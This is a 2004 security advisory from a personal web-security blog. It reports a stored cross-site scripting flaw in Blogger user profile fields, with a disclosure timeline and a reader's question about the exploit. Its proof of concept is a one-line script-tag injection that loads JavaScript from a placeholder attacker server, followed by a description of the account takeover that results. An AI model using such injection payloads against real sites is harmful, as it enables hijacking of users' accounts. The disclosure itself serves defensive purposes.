Blogger XSS Vulnerability

26.03.2004

Okuyucu : 5.753
Günlük Okuyucu : 3,6
------------------------------------------------------
BLOGGER XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?470
Severity : Moderately Critical for Members (Permanent Account Hijacking)

------------------------------------------------------
ABOUT BLOGGER;
------------------------------------------------------
Blogger is a web-based tool that helps you publish to the web instantly -- whenever the urge strikes. Blogger is the leading tool in the rapidly growing area of web publishing known as weblogs, or "blogs."

by Google (Pyra Labs acquired by Google)

------------------------------------------------------
XSS DETAILS;
------------------------------------------------------
There is no HTML filter when rendering user profiles. So anyone can inject a script into a profile's "First Name" "Last Name" etc.

If you inject a code into "First Name" this will be print and run in users's first page [www.blogger.com], so an attacker can easily gain victim's account.



	------------------------------------------------------
	Proof Of Concept;
	------------------------------------------------------
	Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] to victim "First Name"
	Now you can execute anything in remote.

	After login as your victim;
		  I. You can change password (without old password)
		 II. You can change e-mail address without any confirmation
		III. You can own the victim blogs

	
	*Replace ][,<>
	*Script injection is limited to 50 characters (but it's pretty enough to add js script)


-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 2/22/2004
Vendor Informed : 2/25/2004
Published : 3/26/2004

------------------------------------------------------
VENDOR STATUS;
------------------------------------------------------
Contact established with Google but there is no answer.

Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh[at]mavituna.com

Yorumlar

RSS Bu makalenin yorumlarını RSS ile takip et!

I'm a little lost to say the least when it comes to this exploit. Playing around I created a blog @ blogger.com but do not understand your paper to fully learn what this exploit does?

I mean ' http://[ATTACKER-SERVER]/EVIL-JS/"][/script]'

So I would assume that you mean that http://[ATTACKER-SERVER] is really http://www.blogger.com or some other blogging sql site but then you have /[EVIL-JS]/ which I assume is a file or a script? I'm just not sure at all!

So would one need to create the 'file' "evil-js.js" with the appropriate sql call to send to the attack server? if so then what would "evil=js" be or what would the "evil java script" be? How does it "add" or "change"a passwords on such a big site as blogger?

SolarisZen [ # | 08.08.2007 ]

Yorum Ekle





Kullanılabilir Taglar : [<blockquote>] [<strong>] [<em>]

Diğer Yazılar

Neredeyim ?

Ferruh.Mavituna » Advisories » Blogger XSS Vulnerability

RSS Feed site statistics RSS Subscribers
Siteyi E-mail ile Takip Et

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna

Sabit IP Adresi : 81.22.99.133, SSL Erişimi, Hakkında